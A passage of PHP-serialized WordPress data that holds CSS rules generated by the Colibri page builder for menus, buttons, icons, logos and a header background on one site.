.colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:18;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:19;a:3:{s:7:\"desktop\";s:164:\"#colibri .style-19 {\n  background-color: black;\n  background-image: none;\n  padding-top: 5px;\n  padding-right: 15px;\n  padding-bottom: 5px;\n  padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:20;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-20 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:21;a:3:{s:7:\"desktop\";s:1279:\"#colibri .style-21-icon {\n  fill: #FFFFFF;\n  width: 18px ;\n  height: 18px;\n  padding-left: 0px;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: none;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: none;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: none;\n}\n#colibri .style-21-icon:hover {\n  background-color: rgba(3, 169, 244, 0);\n  background-image: none;\n}\n#colibri .style-21 .list-item-text-wrapper {\n  horizontal-align: start;\n  padding-right: 0px;\n  padding-bottom: 0px;\n}\n#colibri .style-21 .list-text {\n  margin-left: 5px;\n  color: #FFFFFF;\n  font-size: 14px;\n}\n#colibri .style-21 .list-divider {\n  color: rgb(0,0,0);\n  width: 100% ;\n  height: 100%;\n  border-top-width: 0px;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-style: solid;\n  margin-left: 0px;\n}\n#colibri .style-21 .list-container-divider {\n  width: 1px ;\n  padding-top: 0px;\n  padding-right: 10px;\n  padding-bottom: 0px;\n  padding-left: 10px;\n  height: 100%;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:22;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-22 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:23;a:3:{s:7:\"desktop\";s:376:\"#colibri .style-23 .social-icon-container {\n  margin-right: 0px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .style-23 .icon-container {\n  fill: rgb(204, 204, 204);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-23 .icon-container:hover {\n  fill: #FFFFFF;\n}\n#colibri .style-23 .icon-container:hover {\n  fill: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:24;a:3:{s:7:\"desktop\";s:739:\"#colibri .style-24 {\n  height: auto;\n  min-height: unset;\n  color: #FFFFFF;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/plugins/colibri-page-builder/extend-builder/assets/partials-images/images-xheader-default-0-1545411152082.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  padding-top: 150px;\n  padding-bottom: 150px;\n}\n#colibri .style-24 h1 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h2 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h3 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h4 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h5 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h6 {\n  color: #FFFFFF;\n}\n#colibri .style-24 p {\n  color: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:25;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:26;a:3:{s:7:\"desktop\";s:302:\"#colibri .style-26 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 0px;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:27;a:3:{s:7:\"desktop\";s:330:\"#colibri .style-27 p,#colibri .style-27  h1,#colibri .style-27  h2,#colibri .style-27  h3,#colibri .style-27  h4,#colibri .style-27  h5,#colibri .style-27  h6 {\n  font-weight: 600;\n}\n#colibri .style-27 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:28;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:29;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:30;a:3:{s:7:\"desktop\";s:1290:\"#colibri .style-30-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-30 {\n  background-color: #03a9f4;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1em;\n  letter-spacing: 1px;\n  color: white;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-top-left-radius: 56px;\n  border-top-right-radius: 56px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 56px;\n  border-bottom-right-radius: 56px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n  padding-top: 15px;\n  padding-right: 30px;\n  padding-bottom: 15px;\n  padding-left: 30px;\n  text-align: center;\n}\n#colibri .style-30:hover,#colibri .style-30:focus {\n  background-color: rgb(2, 110, 159);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-30:active .style-30-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:31;a:3:{s:7:\"desktop\";s:1259:\"#colibri .style-31-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-31 {\n  background-color: transparent;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1em;\n  letter-spacing: 1px;\n  color: white;\n  border-top-width: 2px;\n  border-top-color: white;\n  border-top-style: solid;\n  border-top-left-radius: 56px;\n  border-top-right-radius: 56px;\n  border-right-width: 2px;\n  border-right-color: white;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: white;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 56px;\n  border-bottom-right-radius: 56px;\n  border-left-width: 2px;\n  border-left-color: white;\n  border-left-style: solid;\n  padding-top: 15px;\n  padding-right: 30px;\n  padding-bottom: 15px;\n  padding-left: 30px;\n  text-align: center;\n}\n#colibri .style-31:hover,#colibri .style-31:focus {\n  background-color: rgba(255, 255, 255, 0.25);\n  border-top-color: #FFFFFF;\n  border-right-color: #FFFFFF;\n  border-bottom-color: #FFFFFF;\n  border-left-color: #FFFFFF;\n}\n#colibri .style-31:active .style-31-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:32;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-32 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:33;a:3:{s:7:\"desktop\";s:730:\"#colibri .style-33-image {\n  opacity: 1;\n}\n#colibri .style-33-overlay {\n  background-color: unset;\n  background-image: none;\n}\n#colibri .style-33-caption {\n  margin-top: 10px;\n}\n#colibri .style-33-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:34;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:35;a:3:{s:7:\"desktop\";s:372:\"#colibri .style-35 {\n  animation-duration: 0.5s;\n  padding-top: 20px;\n  padding-right: 15px;\n  padding-bottom: 20px;\n  padding-left: 15px;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n  background-color: #ffffff;\n  background-image: none;\n  padding-top: 10px;\n  padding-bottom: 10px;\n  box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:192:\"#colibri .style-35 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";}i:36;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:37;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-37 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:38;a:3:{s:7:\"desktop\";s:567:\"#colibri .style-38-image {\n  max-height: 70px;\n}\n#colibri .style-38 a,#colibri .style-38  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n  font-size: 24px;\n}\n#colibri .style-38 .logo-text {\n  color: #FFFFFF;\n}\n#colibri .h-navigation_sticky .style-38-image,#colibri .h-navigation_sticky.style-38-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-38 a,#colibri .h-navigation_sticky .style-38  .logo-text,#colibri .h-navigation_sticky.style-38 a,#colibri .h-navigation_sticky.style-38  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:39;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-39 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:40;a:3:{s:7:\"desktop\";s:39:\"#colibri .style-40 {\n  height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:41;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-41 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:42;a:3:{s:7:\"desktop\";s:8581:\"#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu {\n  justify-content: flex-end;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: #FFFFFF;\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(166, 220, 244);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(166, 220, 244);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: rgb(166, 220, 244);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul {\n  background-color: #ffffff;\n  background-image: none;\n  margin-right: 5px;\n  margin-left: 5px;\n  box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: rgb(255, 255, 255);\n  background-image: none;\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: #03a9f4;\n  background-image: none;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-42 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: rgb(166, 220, 244);\n  background-image: none;\n  height: 3px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-42 \n      ul.colibri-menu.solid-active-item > li::before {\n  background-color: white;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0%;\n  border-top-right-radius: 0%;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0%;\n  border-bottom-right-radius: 0%;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > ul {\n  margin-top: 0px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n  height: 0px;\n  width: 100% ;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .h-navigation_sticky .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-42 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-42 \n      ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-42 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-42 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: #03a9f4;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:43;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-43-offscreen {\n  background-color: #222B34;\n  background-image: none;\n  width: 300px !important;\n}\n#colibri .style-43-offscreenOverlay {\n  background-color: rgba(0,0,0,0.5);\n  background-image: none;\n}\n#colibri .style-43  .h-hamburger-icon {\n  background-color: rgba(0, 0, 0, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: solid;\n  border-top-left-radius: 100%;\n  border-top-right-radius: 100%;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 100%;\n  border-bottom-right-radius: 100%;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: solid;\n  fill: white;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n  width: 24px;\n  height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:44;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:45;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:46;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-46 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:47;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-47-image {\n  max-height: 70px;\n}\n#colibri .style-47 a,#colibri .style-47  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-47-image,#colibri .h-navigation_sticky.style-47-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-47 a,#colibri .h-navigation_sticky .style-47  .logo-text,#colibri .h-navigation_sticky.style-47 a,#colibri .h-navigation_sticky.style-47  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:48;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:49;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-49 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:50;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-50  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-50  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-50  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:51;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:52;a:3:{s:7:\"desktop\";s:164:\"#colibri .style-52 {\n  background-color: black;\n  background-image: none;\n  padding-top: 5px;\n  padding-right: 15px;\n  padding-bottom: 5px;\n  padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:53;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-53 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:54;a:3:{s:7:\"desktop\";s:1279:\"#colibri .style-54-icon {\n  fill: #FFFFFF;\n  width: 18px ;\n  height: 18px;\n  padding-left: 0px;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: none;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: 